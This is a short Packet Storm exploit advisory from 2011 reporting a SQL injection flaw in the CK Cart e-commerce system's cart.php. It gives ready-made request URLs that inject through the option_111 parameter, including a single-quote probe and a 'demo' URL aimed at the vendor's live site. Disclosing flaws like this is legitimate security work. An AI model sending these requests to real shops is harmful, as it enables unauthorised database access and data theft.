CK Cart SQL Injection

2011-08-22T00:00:00
ID PACKETSTORM:104305
Type packetstorm
Reporter Eyup CELIK
Modified 2011-08-22T00:00:00

Description

                                        
                                            `# Exploit Title: CK Cart (E-Commerce System) SQL Injection  
# Date: 19.08.2011  
# Author: Eyup CELIK  
# Software Link: http://www.ckcart.com/  
# Version: All Version  
# Tested on: All versions are Vulnerability  
  
ISSUE  
  
SQL Injection can be done using the command input  
  
Vulnerable Page:  
cart.php  
  
Example:  
cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24<SQL   
Injection Code>&quantity=1&submit=Order  
  
Exploit:  
cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24'1&quantity=1&submit=Order  
  
Demo:  
http://www.ckcart.com/cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24<SQL Injection   
Code>&quantity=1&submit=Order  
  
  
Thanks,  
  
  
Eyup CELIK  
Bilgi Teknolojileri Güvenlik Uzmani  
http://www.eyupcelik.com.tr  
`